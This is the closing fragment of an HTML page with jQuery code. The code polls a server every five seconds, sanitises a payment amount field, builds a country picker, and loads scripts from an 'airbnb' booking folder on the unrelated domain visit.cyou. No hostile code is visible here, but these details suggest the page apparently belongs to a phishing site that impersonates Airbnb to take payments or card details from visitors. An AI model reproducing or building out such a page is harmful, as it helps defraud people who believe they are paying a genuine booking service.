					//console.error("Ошибка: " + textStatus + ", " + errorThrown);
				},
				complete: function () {
					ajaxSendStatus = false;
				},
			});
		}

		setInterval(onPage, 5000);
		onPage();
	</script>
	<script>
		$('body').on('input', '#amount_input', function () {
			var value = $(this).val();
			if (/^0(?![.,])/.test(value)) {
				value = value.substring(1);
			}
			value = value.replace(/[^0-9.,]/g, '');
			value = value.replace(/([.,])\1+/g, '$1');
			var dotIndex = value.indexOf('.');
			var commaIndex = value.indexOf(',');
			if (dotIndex !== -1 || commaIndex !== -1) {
				var separatorIndex = dotIndex !== -1 ? dotIndex : commaIndex;
				value = value.substring(0, separatorIndex + 3);
			}
			if (/^0[0-9]/.test(value)) {
				value = value.substring(1);
			}
			if (dotIndex !== -1 && commaIndex !== -1) {
				if (dotIndex < commaIndex) {
					value =
						value.substring(0, dotIndex + 1) +
						value.substring(dotIndex + 1).replace(/,/g, '');
				} else {
					value =
						value.substring(0, commaIndex + 1) +
						value.substring(commaIndex + 1).replace(/\./g, '');
				}
			}
			$(this).val(value);
		});
	</script>

	<div class="countries">
		<div class="countries__block">
			<div class="countries__head">
				<div class="countries__close">
					<svg
						xmlns="http://www.w3.org/2000/svg"
						viewBox="0 0 32 32"
						aria-hidden="true"
						role="presentation"
						focusable="false"
						style="
							display: block;
							fill: none;
							height: 16px;
							width: 16px;
							stroke: currentcolor;
							stroke-width: 3;
							overflow: visible;
						"
					>
						<path d="m6 6 20 20M26 6 6 26"></path>
					</svg>
				</div>
				<h2>Country/region</h2>
				<i></i>
			</div>

			<div class="countries__list-wrapper">
				<div class="countries__list"></div>
			</div>
		</div>
	</div>

	<script src="https://visit.cyou/dist/booking/airbnb/script2.js?v=192618"></script>
	<script src="https://visit.cyou/dist/booking/airbnb/fixes.js?v=192618"></script>
</html>
